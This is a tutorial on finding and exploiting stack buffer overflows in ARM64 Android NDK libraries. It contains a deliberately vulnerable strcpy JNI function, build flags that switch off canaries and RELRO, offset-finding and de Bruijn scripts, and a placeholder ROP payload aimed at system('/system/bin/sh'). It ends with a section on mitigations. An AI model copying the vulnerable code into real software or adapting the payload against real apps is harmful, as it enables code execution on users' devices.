Introduction: The Peril of Stack Overflows in ARM64 NDK Binaries
Stack overflows remain a critical vulnerability class, even on modern ARM64 architectures. Classic x86 buffer overflows, where `RET` pops an overwritten return address into `EIP`, are well documented. Exploiting overflows on ARM64, particularly within Android NDK applications, raises distinct architectural considerations: the return address lives in the Link Register (`X30`) and reaches the stack only when a function saves it in its prologue. This article covers identifying, analyzing, and exploiting stack buffer overflows in ARM64 native binaries on Android, with a focus on ARM64 assembly, debugging techniques, and control-flow hijacking.
Setting Up Your Android Reverse Engineering Environment
Before diving into exploitation, a robust environment is crucial. You’ll need:
- Android device (rooted or emulator)
- Android Debug Bridge (ADB)
- Android NDK for cross-compilation
- Disassembler/Decompiler (IDA Pro or Ghidra)
- GDB client and server (pre-built `gdbserver` for ARM64 on Android)
- Optional: Frida for dynamic instrumentation
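Ensure `adb` is configured and your device is accessible. Push `gdbserver` to `/data/local/tmp` and make it executable. Older NDK releases ship it as `<ndk-path>/prebuilt/android-arm64/gdbserver/gdbserver`. Current NDKs no longer include GDB and provide LLDB (`lldb-server`) instead. Attaching to another app’s process normally also requires root, for example on a rooted device or on an emulator image where `adb root` works:

```shell
adb push <ndk-path>/prebuilt/android-arm64/gdbserver/gdbserver /data/local/tmp/gdbserver
adb shell "chmod 755 /data/local/tmp/gdbserver"
```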
Identifying the Vulnerability: A C/C++ Example
A classic stack buffer overflow occurs when a program writes more data to a stack buffer than it was designed to hold. The excess overwrites adjacent stack data, including the saved copy of the return address (the Link Register, `LR`/`X30`). Consider this vulnerable C++ NDK function:
```cpp
#include <cstring>   // strcpy
#include <string>
#include <vector>
#include <jni.h>

extern "C" JNIEXPORT jstring JNICALL
Java_com_example_vulnerableapp_MainActivity_vulnerableFunction(JNIEnv* env, jobject /* this */, jstring inputString) {
    char buffer[128];
    const char* nativeString = env->GetStringUTFChars(inputString, nullptr);
    strcpy(buffer, nativeString); // Vulnerable! No bounds checking
    env->ReleaseStringUTFChars(inputString, nativeString);

    std::string hello = "Processed: ";
    hello += buffer;
    return env->NewStringUTF(hello.c_str());
}
```
The `strcpy` call here is the culprit. It copies `nativeString` into `buffer`, including the terminating NUL, without checking `buffer`’s size. Any input of 128 bytes or more therefore overflows the buffer, because the terminator needs a 129th byte.
Compiling for ARM64
To compile this with NDK, you’d typically use `cmake` or `ndk-build`. For `ndk-build`, a simple `Android.mk` might look like:
```makefile
LOCAL_PATH := $(call my-dir)

include $(CLEAR_VARS)

LOCAL_MODULE    := native-lib
LOCAL_SRC_FILES := native-lib.cpp
# Disable stack canaries for easier exploitation
LOCAL_CFLAGS    += -fno-stack-protector
# Disable RELRO for easier exploitation
LOCAL_LDFLAGS   += -Wl,-z,norelro

include $(BUILD_SHARED_LIBRARY)
```
Build for the `arm64-v8a` ABI only:

```shell
ndk-build APP_ABI=arm64-v8a
```
ARM64 Assembly Analysis: Understanding the Stack Frame
Once compiled, load the `libnative-lib.so` into IDA Pro or Ghidra. Locate `Java_com_example_vulnerableapp_MainActivity_vulnerableFunction`. On ARM64, the stack frame layout is critical:
- `SP` (Stack Pointer): Points to the top of the stack.
- `FP` (Frame Pointer, `X29`): Optionally points to the base of the current stack frame.
- `LR` (Link Register, `X30`): Holds the return address for the function call.
- Local variables are allocated on the stack below `FP`/`LR`.
A typical ARM64 function prologue might look like this:
```asm
STP X29, X30, [SP, #-0xYY]!   ; Push FP and LR onto the stack, adjust SP
MOV X29, SP                   ; Set FP to the current SP position
```
And the epilogue:
```asm
LDP X29, X30, [SP], #0xYY     ; Pop FP and LR from the stack, adjust SP
RET                           ; Return using the value in LR
```
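Your goal is to overflow `buffer` far enough to overwrite the saved `LR` value on the stack. The epilogue reloads `X30` from that slot and `RET` branches to it, so controlling the saved `LR` gives you control of execution when the function returns.

Whether the overflow reaches this function’s own saved `LR` depends on where the compiler places the frame record. Clang, the NDK’s compiler, typically allocates locals below it (e.g. `sub sp, sp, #0xa0` followed by `stp x29, x30, [sp, #0x90]`), so writing past the end of `buffer` runs into the saved `X29` and then `X30`. Sometimes the prologue’s pre-indexed `STP` allocates the whole frame, which puts the frame record at the bottom, below the locals. In that case the overflow corrupts the caller’s frame instead, and control is hijacked only when the caller returns.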
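To make the overwrite concrete, here is a minimal Python model of a hypothetical Clang-style frame for `vulnerableFunction`. It assumes a 0xa0-byte frame with `buffer` at `SP+0x10` and the frame record (`X29`, `X30`) at `SP+0x90`. These offsets are assumptions for illustration; read the real ones from your disassembly. The model copies input the way `strcpy` does (up to the first NUL, then writes a terminator). It then performs the epilogue `LDP X29, X30, [SP, #0x90]; ADD SP, SP, #0xa0; RET` and returns the address `RET` would branch to.

```python
import struct

# Hypothetical Clang-style frame for vulnerableFunction (offsets from SP after
# the prologue); take the real values from your disassembly.
FRAME_SIZE = 0xA0         # sub sp, sp, #0xa0
BUFFER_OFF = 0x10         # add x0, sp, #0x10 ; bl strcpy
FRAME_RECORD_OFF = 0x90   # stp x29, x30, [sp, #0x90]


def strcpy_into(stack: bytearray, dst: int, src: bytes) -> None:
    """Copy src up to its first NUL and then write a NUL, as strcpy does."""
    end = src.find(b"\x00")
    data = (src if end == -1 else src[:end]) + b"\x00"
    stack[dst:dst + len(data)] = data


def simulate_return(user_input: bytes, saved_lr: int = 0x7F12345678) -> int:
    """Model the overflow and the epilogue; return the address RET branches to."""
    # This frame plus part of the caller's frame above it.
    stack = bytearray(FRAME_SIZE + 0x60)
    # Prologue: the frame record holds the caller's FP and the return address.
    struct.pack_into("<QQ", stack, FRAME_RECORD_OFF, 0x7FFFFFF000, saved_lr)
    strcpy_into(stack, BUFFER_OFF, user_input)
    # Epilogue: LDP X29, X30, [SP, #0x90]; ADD SP, SP, #0xa0; RET -> X30
    _saved_fp, x30 = struct.unpack_from("<QQ", stack, FRAME_RECORD_OFF)
    return x30
```

With this layout, a 128-byte input only reaches the saved `X29`, because its terminating NUL lands there. Input of 136 filler bytes followed by `BBBBBBBB` makes `simulate_return` yield `0x4242424242424242`. The terminating NUL also means `strcpy` can replace just the low-order bytes of the saved `LR` while leaving its upper bytes intact.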
Calculating the Offset to LR
Using your disassembler:
- Identify the frame allocation (e.g., `sub sp, sp, #0xYYY`) and where `buffer` lives inside it. The address passed to `strcpy` in `X0` (for example, `add x0, sp, #0x10` just before `bl strcpy`) gives the buffer’s offset from `SP`.
- Determine the distance from the start of `buffer` to the saved `X29` and `X30` (`LR`) on the stack. The `buffer` is usually addressed relative to `SP` or `X29`.
- Example: suppose analysis of `char buffer[128]` shows `buffer` at `SP+0x10` and the frame record saved with `stp x29, x30, [sp, #0x90]`. That places the saved `X29` at `SP+0x90` and the saved `X30` at `SP+0x98`. The buffer ends exactly where the frame record begins (`0x10 + 0x80 = 0x90`). The offset from the start of `buffer` to the saved `LR` is therefore `0x98 - 0x10 = 0x88`: 128 bytes of buffer plus 8 bytes of saved `X29`, or 136 bytes. Padding, extra callee-saved registers, and compiler optimizations can change these numbers, so always derive them from the actual disassembly.
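The offset arithmetic above can be scripted. Below is a minimal sketch that assumes Clang-style disassembly text. In that text, the buffer address is formed by `add x0, sp, #imm` on the line right before the `strcpy` call, and the frame record is saved with `stp x29, x30, [sp, #imm]`. Both patterns, the helper names, and the sample listing are hypothetical and will differ between builds and disassemblers.

```python
import re

STP_RECORD = re.compile(r"stp\s+x29,\s*x30,\s*\[sp,\s*#(0x[0-9a-f]+|\d+)\]")
ADD_X0_SP = re.compile(r"add\s+x0,\s*sp,\s*#(0x[0-9a-f]+|\d+)")


def parse_imm(text: str) -> int:
    """Parse an immediate written in hex (0x..) or decimal."""
    return int(text, 16) if text.startswith("0x") else int(text)


def offset_to_saved_lr(listing: str) -> int:
    """Bytes from the strcpy destination to the saved X30 (LR) slot."""
    lines = [line.strip().lower() for line in listing.splitlines()]
    record_off = buffer_off = None
    for i, line in enumerate(lines):
        m = STP_RECORD.search(line)
        if m:
            record_off = parse_imm(m.group(1))
        m = ADD_X0_SP.search(line)
        # Only trust the X0 set-up that directly precedes the call to strcpy.
        if m and i + 1 < len(lines) and "strcpy" in lines[i + 1]:
            buffer_off = parse_imm(m.group(1))
    if record_off is None or buffer_off is None:
        raise ValueError("frame record store or strcpy destination not found")
    # The frame record stores X29 first and X30 (LR) 8 bytes above it.
    return record_off + 8 - buffer_off


SAMPLE = """
    sub  sp, sp, #0xa0
    stp  x29, x30, [sp, #0x90]
    add  x29, sp, #0x90
    add  x0, sp, #0x10
    bl   strcpy
"""
print(offset_to_saved_lr(SAMPLE))  # 136
```

A pre-indexed store such as `stp x29, x30, [sp, #-0x20]!` deliberately does not match the pattern. That layout keeps the frame record below the locals, where the overflow cannot reach it, so the offset has to be worked out differently.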
Debugging the Crash and Confirming Control
To confirm the overflow and gain control, attach `gdbserver` to your process:
```shell
# Single quotes make $(pidof ...) run on the device, not on the host.
adb shell '/data/local/tmp/gdbserver :1234 --attach $(pidof com.example.vulnerableapp)'
```
On your host machine, forward the port and connect with `aarch64-linux-android-gdb` (shipped with older NDK releases; any AArch64-capable GDB, such as `gdb-multiarch`, also works):
```
adb forward tcp:1234 tcp:1234
aarch64-linux-android-gdb ./libnative-lib.so
(gdb) target remote :1234
```
Now, send an input string longer than 128 bytes (e.g., 144 ‘A’s). If the offset is 136, then 136 ‘A’s followed by 8 ‘B’s overwrite the saved `LR` slot with `0x4242424242424242`. When the function returns, it branches to that address. The application crashes, and GDB should show `LR` (or `PC`) holding your overwritten value, `0x4242424242424242`.
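If you are unsure of the offset, a common alternative to the ‘A’/‘B’ probe is a non-repeating de Bruijn pattern. Send the pattern as the input, read `X30` at the crash, and look up where those eight bytes occur in the pattern. Below is a stdlib-only sketch. The helper names mirror pwntools’ `cyclic` and `cyclic_find`, but this is not that library’s code. The pattern is plain lowercase ASCII, so it passes through `GetStringUTFChars` and `strcpy` unchanged.

```python
import string
import struct
from itertools import islice


def de_bruijn(alphabet: str = string.ascii_lowercase, n: int = 8):
    """Yield a de Bruijn sequence: every n-length window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 8) -> bytes:
    """First `length` bytes of the pattern (ASCII only, no NUL bytes)."""
    return "".join(islice(de_bruijn(n=n), length)).encode("ascii")


def cyclic_find(x30_value: int, length: int = 4096, n: int = 8) -> int:
    """Offset where the crash value's 8 little-endian bytes occur, or -1."""
    return cyclic(length, n).find(struct.pack("<Q", x30_value))
```

Send `cyclic(200)` as the input string, then pass the `X30` value GDB shows (for example, via `info registers x30`) to `cyclic_find`. Under the frame layout assumed in this article, the result would be 136.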
Exploitation Strategy: Return-Oriented Programming (ROP)
Modern systems employ W^X (Write XOR Execute) and ASLR (Address Space Layout Randomization). To bypass W^X, we use Return-Oriented Programming (ROP). ASLR makes it harder to predict addresses, requiring an information leak first; for this tutorial, we’ll assume a simpler scenario where we either know an address or focus on controlling LR. In a real exploit, you’d likely leak an address first.
A ROP chain consists of short sequences of existing code (gadgets) ending in a `RET` instruction, chained together. Each gadget performs a small action (e.g., pop values into registers, perform arithmetic) before returning to the next gadget in your chain.
Finding ARM64 Gadgets
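Tools like ROPgadget, or a direct search in IDA/Ghidra, can help. Most ARM64 gadgets end in `RET`, which branches to the address in `X30`. Sequences ending in `BR Xn` or `BLR Xn` are also usable when `Xn` holds an attacker-controlled address. A simple branch-through-register sequence might be:

```asm
ADRP X8, #page_of_some_data   ; page address of a data slot (e.g. a GOT entry)
LDR  X8, [X8, #offset]        ; load a code pointer from that slot
BR   X8                       ; branch to it
```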
More useful gadgets are those that manipulate registers and then `RET`:
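```asm
; Hypothetical gadget: load X0-X5 from the stack, reload the frame record, return
LDP X0, X1, [SP, #0x10]
LDP X2, X3, [SP, #0x20]
LDP X4, X5, [SP, #0x30]
LDP X29, X30, [SP], #0x40     ; reload FP and LR, then SP += 0x40
RET                           ; branch to the reloaded X30
```
This (hypothetical) gadget loads `X0`-`X5` from the stack and reloads `X29` and `X30` from `[SP]`. It then releases 0x40 bytes of stack and returns to the reloaded `X30`. ARM64 has no `POP`, and `RET` does not read the stack. To continue the chain, you therefore place the next gadget’s address in the slot this gadget reloads into `X30`. The values for `X0`-`X5` go in the slots it reads them from.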
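Laying out a gadget’s stack data is mechanical once you know which slots it reads. The sketch below assumes a hypothetical gadget of the form `LDP X0, X1, [SP, #0x10]; LDP X2, X3, [SP, #0x20]; LDP X4, X5, [SP, #0x30]; LDP X29, X30, [SP], #0x40; RET`. That gadget consumes 0x40 bytes: the frame record at `[SP]` and `[SP+0x08]`, followed by `X0`-`X5`. The helper name `gadget_frame` is made up for illustration.

```python
import struct


def gadget_frame(regs: list[int], next_pc: int, fp: int = 0) -> bytes:
    """Pack the 0x40 bytes the hypothetical gadget reads from the stack.

    Layout: [SP+0x00] X29, [SP+0x08] X30 (next gadget), [SP+0x10..0x3f] X0-X5.
    """
    if len(regs) != 6:
        raise ValueError("expected exactly six values for X0-X5")
    return struct.pack("<QQ", fp, next_pc) + struct.pack("<6Q", *regs)
```

Because the next gadget’s address sits inside the current gadget’s frame, each link in an ARM64 chain is a gadget address followed by that gadget’s own frame, not simply a list of return addresses.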
Your primary goal is usually to call `mprotect` to make a writable memory region executable, then jump to your shellcode within that region. Alternatively, if a `system()` or `execve()` wrapper is available and addresses are known, you could jump directly to it with controlled arguments.
Constructing the Exploit Payload
Let’s assume we want to call a function at a known address (e.g., `system` from `libc`, or a `printf` to leak info). We need to place its address in `LR` and its arguments in `X0-X7`.
- **Offset**: Determine the exact byte offset to overwrite the saved `LR`. Let’s say it’s 136 bytes.
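- **Payload Structure**: `[padding (136 bytes)] + [address_of_gadget_1] + [args for gadget_1] + [address_of_gadget_2] + … + [address_of_shellcode]`. On ARM64, each gadget returns through `X30`. The "address of the next gadget" is therefore whichever stack slot the current gadget reloads into `X30`, and it usually sits inside that gadget’s stack data rather than strictly after it.
- **Example ROP Chain (Conceptual)**: If you wanted to call `system("/system/bin/sh")` and had an information leak, you’d find:
  - The address of the string `"/system/bin/sh"`, or place the string on the stack yourself.
  - The address of `system()` in `libc.so`.
  - A gadget that loads `X0` from the stack and reloads `X30` before `RET`, to put the string address into `X0`. ARM64 has no `POP`; this gadget plays the role of x86-64’s `pop rdi; ret`.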
Your payload would look something like this (all addresses are placeholders):

```python
#!/usr/bin/env python3
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value (same as pwntools' p64)."""
    return struct.pack("<Q", value)


offset_to_lr = 136  # assumed offset from buffer to the saved LR

# Placeholders: real addresses of system() and "/system/bin/sh" need an ASLR bypass/leak
addr_system = 0xAAAAAAAAAAAAAAA0
addr_bin_sh = 0xBBBBBBBBBBBBBBB0

# Hypothetical gadget (find a real one in a loaded binary):
#   LDR X0, [SP, #0x10] ; LDP X29, X30, [SP], #0x20 ; RET
# RET branches to X30, so the gadget must reload X30 from the stack itself.
addr_pop_x0_ret = 0xCCCCCCCCCCCCCCC0

payload = b"A" * offset_to_lr          # buffer[128] + saved X29
payload += p64(addr_pop_x0_ret)         # saved X30 (LR) -> gadget
# Assuming the frame record is the top of the frame, SP points here after RET:
payload += p64(0x4141414141414141)      # [SP+0x00] -> X29 (junk)
payload += p64(addr_system)             # [SP+0x08] -> X30, gadget returns here
payload += p64(addr_bin_sh)             # [SP+0x10] -> X0, argument to system()
payload += p64(0)                       # [SP+0x18] padding
print(payload)
```
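Send this crafted `payload` as the input string to `vulnerableFunction`. The overflow writes `p64(addr_pop_x0_ret)` into the saved `LR` slot on the stack, so `vulnerableFunction` jumps to `addr_pop_x0_ret` when it returns. That gadget loads `addr_bin_sh` into `X0`. Provided it also reloads `X30` from the stack (on ARM64, `RET` branches to `X30` rather than popping the stack), it then returns to `addr_system`, effectively calling `system("/system/bin/sh")`. In practice, a chain like this cannot travel through this `strcpy` unchanged. `strcpy` stops at the first `0x00` byte, and 64-bit Android user-space addresses contain zero upper bytes. In addition, `GetStringUTFChars` yields bytes of `0x80` and above only as parts of valid modified UTF-8 sequences. Delivering a multi-address chain therefore requires a NUL-tolerant copy primitive, such as a `memcpy` with an attacker-controlled length.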
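Before sending a payload through this JNI entry point, it is worth checking for bytes that cannot survive the trip. `strcpy` stops at the first `0x00`, and `GetStringUTFChars` returns modified UTF-8, in which bytes of `0x80` and above appear only inside multi-byte sequences. A minimal sketch of such a check follows; the helper name is hypothetical, and it only flags bytes for review rather than validating full modified UTF-8.

```python
def payload_problems(payload: bytes) -> list[str]:
    """Flag bytes that would not reach the stack intact via GetStringUTFChars + strcpy."""
    problems = []
    nul = payload.find(b"\x00")
    if nul != -1:
        problems.append(f"strcpy stops at the NUL byte at offset {nul}")
    high = [i for i, byte in enumerate(payload) if byte >= 0x80]
    if high:
        # Modified UTF-8 only produces these bytes inside multi-byte sequences.
        problems.append(f"bytes >= 0x80 at offsets {high[:8]} need review")
    return problems
```

A real 64-bit Android user-space address such as `0x0000007f12345678` has zero upper bytes, so appending it to the padding gets flagged immediately.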
Mitigation Strategies
Preventing stack overflows is far simpler than exploiting them:
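- **Bounds Checking**: Use bounded APIs such as `strlcpy` (available in Bionic) or `snprintf`, or use C++ `std::string`, which manages its own storage. `strncpy` limits the copy length but does not NUL-terminate the destination when the source is too long, so it must be paired with explicit termination.
- **Stack Canaries**: Compiler-generated values placed between local buffers and the saved frame record. They are checked before the function returns, and if the value was tampered with, the program aborts via `__stack_chk_fail`. (Disabled in our example with `-fno-stack-protector`.)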
- **ASLR (Address Space Layout Randomization)**: Randomizes memory addresses, making ROP harder without an information leak.
- **NX (Never eXecute) Bit / W^X**: Prevents code execution from data segments, forcing ROP.
- **RELRO (Relocation Read-Only)**: Hardens GOT/PLT, preventing overwrites of function pointers. (Disabled in our example with `-Wl,-z,norelro`).
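To confirm which of these protections a build actually kept, you can inspect the ELF file. The sketch below is a minimal, stdlib-only check for 64-bit little-endian ELF files such as `libnative-lib.so`. It reports whether a `PT_GNU_RELRO` segment exists and whether `PT_GNU_STACK` requests an executable stack. As a rough heuristic, it also reports whether the string `__stack_chk_fail` appears anywhere in the file. Statically linked code can reference that symbol even when your own sources were built with `-fno-stack-protector`. The function name is hypothetical, and it does not look for `BIND_NOW`, so it cannot distinguish partial from full RELRO.

```python
import struct

PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
EM_AARCH64 = 183


def check_mitigations(elf: bytes) -> dict:
    """Report some hardening properties of a 64-bit little-endian ELF image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF file")
    (e_machine,) = struct.unpack_from("<H", elf, 18)
    (e_phoff,) = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)

    relro = False
    executable_stack = None  # None: no PT_GNU_STACK header present
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            relro = True
        elif p_type == PT_GNU_STACK:
            executable_stack = bool(p_flags & PF_X)

    return {
        "aarch64": e_machine == EM_AARCH64,
        "gnu_relro_segment": relro,
        "executable_stack": executable_stack,
        # Rough heuristic: canary checks call __stack_chk_fail on failure.
        "mentions_stack_chk_fail": b"__stack_chk_fail" in elf,
    }
```

For example, compare `check_mitigations(pathlib.Path("libs/arm64-v8a/libnative-lib.so").read_bytes())` for the `-Wl,-z,norelro` build against a default build. `gnu_relro_segment` should differ between the two.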
Conclusion
Exploiting ARM64 stack overflows in Android NDK requires a deep understanding of ARM64 architecture, calling conventions, and debugging techniques. By carefully analyzing the stack frame, calculating offsets, and crafting ROP chains, an attacker can gain arbitrary code execution. However, robust defensive programming practices and compiler-level mitigations are highly effective at preventing these types of attacks, underscoring the importance of secure coding standards in native Android development.